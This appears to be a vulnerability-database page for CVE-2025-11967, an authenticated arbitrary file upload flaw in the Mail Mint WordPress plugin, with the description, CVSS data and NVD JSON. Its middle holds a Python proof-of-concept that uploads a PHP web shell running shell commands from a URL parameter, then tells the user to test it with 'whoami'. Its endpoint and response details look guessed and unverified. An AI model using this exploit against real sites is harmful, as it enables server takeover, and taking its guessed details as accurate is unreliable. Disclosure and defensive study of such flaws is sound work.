Security Vulnerability Report
中文
CVE-2025-11967 CVSS 7.2 HIGH

CVE-2025-11967

Published: 2025-11-08 10:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Mail Mint plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the process_contact_attribute_import function in all versions up to, and including, 1.18.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Mail Mint <= 1.18.10 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11967 Mail Mint Arbitrary File Upload PoC # Requirements: Administrator access to WordPress import requests import json target_url = "http://target-wordpress-site.com" wp_admin_path = f"{target_url}/wp-admin" # Authentication cookies (Administrator session) cookies = { "wordpress_test_cookie": "WP Cookie check", "wordpress_logged_in_xxx": "your-admin-token" } # Malicious PHP file content for RCE php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # File upload endpoint (Contact Import functionality) upload_url = f"{target_url}/wp-json/mail-mint/v1/import/contact-attribute" files = { 'file': ('shell.php', php_payload, 'application/x-php') } data = { 'action': 'process_contact_attribute_import', 'nonce': 'your-import-nonce-value' } print("[*] Attempting to upload malicious file...") response = requests.post(upload_url, files=files, data=data, cookies=cookies) if response.status_code == 200: result = response.json() if result.get('success'): uploaded_file = result.get('file_path') print(f"[+] File uploaded successfully: {uploaded_file}") print(f"[+] Access shell at: {uploaded_file}?cmd=whoami") else: print(f"[-] Upload failed: {result.get('message')}") else: print(f"[-] Request failed with status: {response.status_code}") # Note: Actual exploitation requires valid WordPress admin session and proper nonce validation

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11967", "sourceIdentifier": "[email protected]", "published": "2025-11-08T10:15:40.643", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mail Mint plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the process_contact_attribute_import function in all versions up to, and including, 1.18.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3389643/mail-mint/tags/1.18.11/app/API/Actions/Admin/Contact/ContactImportAction.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf902756-21f3-483b-a5d8-a9b4226bde22?source=cve", "source": "[email protected]"}]}}